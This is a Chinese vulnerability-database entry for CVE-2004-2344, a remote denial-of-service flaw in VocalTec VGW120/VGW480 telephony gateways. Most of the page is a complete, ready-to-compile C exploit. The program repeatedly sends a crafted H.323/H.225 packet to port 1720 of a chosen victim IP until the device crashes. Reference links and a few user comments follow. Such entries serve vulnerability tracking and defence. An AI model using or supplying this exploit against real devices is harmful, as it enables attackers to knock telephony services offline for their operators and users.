VocalTec VGW120/ VGW480 Telephony Gateway远程H.225拒绝服务漏洞
漏洞ID | 1107966 | 漏洞类型 | 其他 |
发布时间 | 2004-05-24 | 更新时间 | 2005-10-20 |
CVE编号 | CVE-2004-2344 |
CNNVD-ID | CNNVD-200412-535 |
漏洞平台 | Hardware | CVSS评分 | 5.0 |
|漏洞来源
|漏洞详情
VocalTecVGW120/VGW480是电话网关系统。VocalTecVGW120/VGW480电话网关在处理部分H.323通信时存在问题,远程攻击者可以利用这个漏洞对设备进行拒绝服务攻击。提交特殊构建的H.323通信给VocalTecVGW120/VGW480电话网关,会由于ASN.1/H.323/H.225堆栈发生问题而产生拒绝服务。
|漏洞EXP
source: http://www.securityfocus.com/bid/10411/info
It has been reported that the VocalTec VGW120 and VGW480 Telephony Gateways are prone to a remote denial of service vulnerability. The issue is reported to exist in the ASN.1/H.323/H.225 stack.
A remote attacker may exploit this issue to deny service to the affected appliances.
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <fcntl.h>
#include <netdb.h>
#include <unistd.h>
#include <errno.h>
#define H323_SIGNAL_PORT 1720
unsigned char kill_buff[] = {
0x03, 0x00, 0x01, 0x57, 0x08, 0x02, 0x00, 0x04, 0x05, 0x04, 0x03, 0x80, 0x90, 0xa5, 0x6c, 0x0b,
0x81, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x70, 0x0c, 0x81, 0x31, 0x32,
0x33, 0x34, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x7e, 0x01, 0x2b, 0x05, 0x20, 0x80, 0x06,
0x00, 0x08, 0x91, 0x4a, 0x00, 0x04, 0x28, 0x00, 0xb5, 0x00, 0x00, 0x12, 0x40, 0x01, 0x3c, 0x05,
0x01, 0x00, 0x00, 0x61, 0x62, 0x63, 0x64, 0x65, 0x66, 0x67, 0x68, 0x61, 0x62, 0x63, 0x64, 0x65,
0x66, 0x67, 0x68, 0x00, 0x8d, 0x1d, 0x82, 0x07, 0x00, 0xac, 0x10, 0x01, 0x01, 0x02, 0x9a, 0x11,
0x00, 0x62, 0x62, 0x63, 0x64, 0x65, 0x66, 0x67, 0x68, 0x61, 0x62, 0x63, 0x64, 0x65, 0x66, 0x67,
0x68, 0x32, 0x02, 0x12, 0x00, 0x00, 0x00, 0x0d, 0x40, 0x01, 0x80, 0x0a, 0x04, 0x00, 0x01, 0x00,
0xac, 0x10, 0x01, 0x01, 0x47, 0xf1, 0x1d, 0x40, 0x00, 0x00, 0x06, 0x04, 0x01, 0x00, 0x4d, 0x40,
0x01, 0x80, 0x11, 0x14, 0x00, 0x01, 0x00, 0xac, 0x10, 0x01, 0x01, 0x47, 0xf0, 0x00, 0xac, 0x10,
0x01, 0x01, 0x47, 0xf1, 0x01, 0x00, 0x01, 0x00, 0x01, 0x80, 0x01, 0x80, 0x00, 0x0a, 0xa8, 0x01,
0x80, 0x6f, 0x01, 0x40, 0xb5, 0x00, 0x00, 0x12, 0x68, 0xe0, 0x01, 0x01, 0x00, 0x01, 0x1c, 0x58,
0x1c, 0x39, 0x9e, 0x01, 0x00, 0x03, 0x67, 0x74, 0x64, 0x00, 0x00, 0x00, 0x2e, 0x49, 0x41, 0x4d,
0x2c, 0x0d, 0x0a, 0x47, 0x43, 0x49, 0x2c, 0x33, 0x39, 0x61, 0x65, 0x65, 0x31, 0x35, 0x65, 0x62,
0x66, 0x31, 0x38, 0x31, 0x31, 0x64, 0x33, 0x38, 0x30, 0x30, 0x62, 0x64, 0x39, 0x63, 0x39, 0x65,
0x62, 0x30, 0x62, 0x31, 0x33, 0x35, 0x65, 0x0d, 0x0a, 0x0d, 0x0a, 0xa1, 0x04, 0x03, 0x90, 0x90,
0xa3, 0x18, 0x03, 0xa1, 0x83, 0x9f, 0x1e, 0x02, 0x81, 0x83, 0x70, 0x0c, 0x81, 0x37, 0x30, 0x39,
0x35, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x04, 0x80, 0x06, 0x00, 0x04, 0x00, 0x00, 0x00,
0x03, 0x35, 0x02, 0x04, 0x67, 0x74, 0x64, 0x01, 0x2e, 0x49, 0x41, 0x4d, 0x2c, 0x0d, 0x0a, 0x47,
0x43, 0x49, 0x2c, 0x33, 0x39, 0x61, 0x65, 0x65, 0x31, 0x35, 0x65, 0x62, 0x66, 0x31, 0x38, 0x31,
0x31, 0x64, 0x33, 0x38, 0x30, 0x30, 0x62, 0x64, 0x39, 0x63, 0x39, 0x65, 0x62, 0x30, 0x62, 0x31,
0x33, 0x35, 0x65, 0x0d, 0x0a, 0x0d, 0x0a};
int nuke_victim(char * ip)
{
int sock;
struct sockaddr_in vict_addr;
if ((sock=socket(AF_INET, SOCK_STREAM, 0))==-1)
{
perror("nuke_victim()::socket()");
return -1;
}
memset(&vict_addr, 0, sizeof(vict_addr));
vict_addr.sin_family=AF_INET;
inet_pton(AF_INET, ip, &vict_addr.sin_addr);
vict_addr.sin_port=htons(H323_SIGNAL_PORT);
if (connect(sock, (struct sockaddr *) &vict_addr, sizeof(vict_addr))==-1)
{
close(sock);
if (errno==ECONNREFUSED) return 1;
perror("nuke_victim()::connect()");
return -1;
}
if (send(sock,kill_buff,sizeof(kill_buff),MSG_NOSIGNAL)!=sizeof(kill_buff))
{
close(sock);
if (errno==EPIPE) return 1;
perror("nuke_victim()::send()");
return -1;
}
close(sock);
return 0;
}
int main(int argc, char ** argv)
{
int ret_flag=0;
int try_count=0;
if (argc<2)
{
fprintf(stderr, "Usage: %s <victim IP>n", argv[0]);
return 1;
}
while((ret_flag=nuke_victim(argv[1]))==0)
{
try_count++;
usleep(100000);
}
if (ret_flag==-1) printf("Execution aborted with internal errorn");
if (ret_flag==1) printf("Victim %s successfully nuked with %d tryesn", argv[1], try_count);
return 0;
}
|参考资料
来源:XF
名称:vocaltec-gateway-dos(16240)
链接:http://xforce.iss.net/xforce/xfdb/16240
来源:www.securitylab.ru
链接:http://www.securitylab.ru/45401.html
来源:BID
名称:10411
链接:http://www.securityfocus.com/bid/10411
来源:NSFOCUS
名称:6486
链接:http://www.nsfocus.net/vulndb/6486
相关推荐: CodeThat.com CodeThatShoppingCart Multiple Input Validation Vulnerabilities
CodeThat.com CodeThatShoppingCart Multiple Input Validation Vulnerabilities 漏洞ID 1096709 漏洞类型 Input Validation Error 发布时间 2005-05-…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666